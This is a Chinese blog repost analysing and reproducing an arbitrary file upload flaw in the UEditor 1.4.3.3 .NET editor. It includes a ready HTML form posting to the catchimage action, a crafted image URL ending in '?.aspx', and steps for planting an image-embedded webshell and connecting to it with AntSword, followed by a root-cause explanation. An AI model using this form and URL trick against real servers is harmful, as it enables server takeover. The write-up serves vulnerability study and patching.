ueditor上传图片回调_ueditor 1.4.3.3 .net版 任意文件上传漏洞分析与复现

最新推荐文章于 2024-05-06 21:36:51 发布
最新推荐文章于 2024-05-06 21:36:51 发布
阅读量623 收藏
点赞数 1
文章标签: ueditor上传图片回调 ueditor上传图片配置 ueditor图片上传错误 ueditor漏洞 url 本地文件 本地文件url

更多全球网络安全资讯尽在邑安全

复现:

1、准备一个vps放需上传的文件,文件后缀名可正常命名;本地需准备一个可以上传的表单。

祖传表单:<form action="http://127.0.0.1:8888/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST"><p>shell addr: <input style="width: 20%" type="text" name="source[]" />p><input type="submit" value="Submit" />form>

2、在本地上传处写入构造好的文件地址,关于如何构造地址,我的理解是需满足两点:① 访问地址可以正常解析图片。② url以.aspx或.asp结尾。
http://x.x.x.x/blank.jpg?.aspx,其中?也可换成##后面也可以跟任意符号(#及之后出现的字符都不会在http的请求中),成功上传后会返回文件路径。c46f85bf35a8fd17e70b78552f8dafa2.png
上传成功后返回路径:f601dea1df151080882754ff1486596c.png
3、得到上传后的文件路径为http://127.0.0.1:8888/ueditor/net/upload/image/20200724/6373120182442592589757697.aspx,蚁剑连接,成功getshell。927ba138382271f03b07f9721162aa1e.png

漏洞原理:

1、本次任意文件上传主要是action=catchimage产生的,可以看到,在catchimage这个分支下,其实例化了CrawlerHandler这个类。60d2ae8a7b2121722d632581a49d6990.png

2、跟进这个类CrawlerHandler,发现在该类中对于上传的文件,只通过校验ContentType来判断是否为图片,未对文件后缀进行正确的校验;fdfdec805b5d004bf0bdf34bf28eb3ad.png

3、而满足条件的文件上传成功后会被重新命名(PathFormatter.Format()),命名文件后缀时,是选取url地址的扩展名作为重命名后文件的后缀,这就给了我们可以操作的空间。只要我们制作一个图片马,便可绕过前面对于文件类型的限制;并将图片地址构造出以.asp或.aspx结尾的url,就能得到一个重命名后后缀为.asp或.aspx的文件。ed11fe501eadb7e3f3b7926833d29b08.png

一点小坑

1、仅.net版本存在该漏洞。
由于对asp和asp.net的不熟悉,并且当时下载页面没有.net的选项,导致我以为下载的asp版的就是有问题的.net版本,结果死活复现不成功,后来发现问题,去github上找到的.net版。

2、测试上传时,给的url地址不能是内网地址,因此需要一个vps。ce72e20e25b0cf49a873a46339074f0a.png

转自先知社区
欢迎收藏并分享朋友圈,让五邑人网络更安全

eed5713ce41d96f240cb172abc1a459f.png

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!

推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 

weixin_39526706
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UEditor上传导致 XSS漏洞复现
afei001
07-16 2533
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS)漏洞。...
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1496
漏洞影响UEditor.Net本,其它语言本暂时未受影响 影响1.4.3.3 .NET
UEditor .Net任意文件上传漏洞复现
m0_37638874的博客
06-08 3188
  漏洞背景   漏洞影响   漏洞利用   漏洞分析漏洞背景漏洞影响漏洞利用首先准备一个html文件用来做post提交 action处填写网站的路径 另外:enctype="application/x-www-form-urlencoded"什么意思?打开html后如下 这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的我们准备一张的图片跟一个小马,小马代码如下 用命令合成图片木马 我们把此木马上传到我们的服务器,记住服务器图片路径在之前的里填写如下参数 是我们服务器的地址后
asp.net core web框架可能存在哪些漏洞
极客神殿
05-06 154
ASP.NET Core 是一个开源的跨平台的 web 应用程序开发框架,它建立在 ASP.NET 框架的基础上,具有更高的性能和可扩展性。为了减少漏洞的风险,开发人员应该实施安全开发最佳实践,如输入验证、输出编码、身份验证和授权、安全的会话管理、日志记录和监控等。此外,及时更新和修补 ASP.NET Core 框架和相关组件也是非常重要的。
UEditor1.4.3.3的webshell漏洞攻击揭秘
主宰
10-09 1万+
前言 UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET本,其它的本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 漏洞利用 笔者本地测试的编辑器是...
ueditor getshell漏洞重现及分析
weixin_30681121的博客
12-07 1274
0x00 概述 8月21日,网上爆出ueditor .net本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
【132】为UEditor1.4.3.3编写代码插件
zhangchao19890805的专栏
12-06 410
整个项目的代码在 https://gitee.com/zhangchao19890805/csdnBlog.git 中的blog132文件夹中。 写这个代码插件的原因:觉着UEditor默认自带的代码插件太丑了,所以决定自定义一个新的代码插件。 如果想要运行代码,需要Tomcat 8.5,把 zhangchao_ueditor1_4-utf8-jsp 文件夹放到 webapps 文件夹中。启动 ...
ueditor-1.4.3.3 jsp本源码(UTF-8)
05-01
ueditor1.4.3.3本支持图片、文件等上传,通过`Uploader`类实现。它采用了异步上传方式,利用AJAX技术,用户在编辑过程中可以实时上传图片,提高用户体验。 5. **自定义扩展** 开发者可以根据需求对ueditor...
ueditor-1.4.3.3-完整+PHP本.zip
03-02
UEditor 1.4.3.3 完整与PHP环境的集成解析》 UEditor 是一款广泛应用于Web开发中的开源富文本编辑器,它由百度公司开发,提供了丰富的编辑功能,使得用户在网页上可以方便地进行文本编辑、格式调整、图片上传等...
百度编辑器ueditor-1.4.3.3 utf8-net 和 ueditor-1.4.3.2 gbk-net
最新发布
05-13
本文将详细介绍“百度编辑器ueditor”的两个不同本——ueditor-1.4.3.3 utf8-net 和 ueditor-1.4.3.2 gbk-net,以及它们在.NET环境中的应用。 **一、ueditor概述** ueditor是由百度公司开发的一款强大的在线富...
ueditor-1.4.3.3 gbk-net
09-04
2. **图片上传与管理**:集成图片上传功能,用户可以直接在编辑器中上传图片,并进行简单的编辑,如裁剪、旋转等。 3. **多媒体插入**:支持插入视频、音频,满足多媒体内容创作的需求。 4. **链接添加**:方便地...
UEditor 1.4.3.3完整源码
05-29
官网下载的百度UEditor1.4.3.3本源码,可以自己编译源码,发布到项目中,实现自己的定制化需求
ueditor上传图片回调_百度Ueditor多图上传遇到的几个坑
weixin_39605414的博客
11-30 290
最近公司用的是百度ueditor插件做富文本。遇到了几个坑的地方,花了不少时间,这次总结下来,希望给大家少走点弯路。一:在遇到后台上传图片过大的时候导致图片显示不全,解决方法:在ueditor/themes/iframes.css位置添加如下代码img { max-width: 100%; /*图片自适应宽度*/}body { overflow-y: scroll !important;}.vie...
UEditor 编辑器实现文件上传到服务器及图片回显问题
秀岩的博客
03-31 1617
UEditor 编辑器实现文件上传到服务器及图片回显问题   在上一节我们讲到了UEditor 编辑器的下载与安装问题,也实现了编辑器初始化问题。但是 UEditor 编辑器重要的文件上传功能却没有实现,那么本文针对此问题,提出一些解决方案。 这里写目录标题UEditor 编辑器实现文件上传到服务器及图片回显问题一、导入 json 支持包和文件上传支持包二、解决 UEditor 文件上传后无法回显问题补充:IDEA中引入 UEditor 编辑器图片回显问题   默认后端未配置,上传的插件是不能加载的。
Ueditor自定义图片上传路径,以及图片回显路径
热门推荐
qq_28534469的博客
04-27 2万+
最近发现Ueditor有个小bug,每次图片都上传到项目路径下,当重新发布一个本后,图片就没了,所以决心修改结构如下:1. 首先,进入config.json,修改如下:其他的都不改,只改选中部分,这个是图片访问路径前缀我们要关注的是【文件访问路径】和【文件上传路径】然后,分析就开始了【分析1】:查找上传路径在哪里用到了,即【imagePathFormat】,只要找到他,就可以找到上传的绝对路径,...
Ueditor编辑器任意文件上传漏洞
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现
UEditor漏洞
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0本中,并且只有.NET本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
C# 使用Ueditor出现http://localhost:***/ueditor/net/controller.ashx?action=config&&noCache=***404问题解决
旭东怪的博客
09-28 6099
http://localhost:46819/ueditor/net/controller.ashx?action=config&&noCache=1601171905273404 (Not Found) 请求后台配置项http错误,上传功能将不能正常使用!
http://localhost:8001/static/plugins/ueditor-1.4.3.3/ueditor.config.js
10-04
用:问题描述:Refused to apply style from '...如果你想解决这个问题,你可以检查配置文件或服务器端设置,确保返回的MIME类型正确。你可以尝试修改服务器端的配置来更改MIME类型为正确的样式表MIME类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值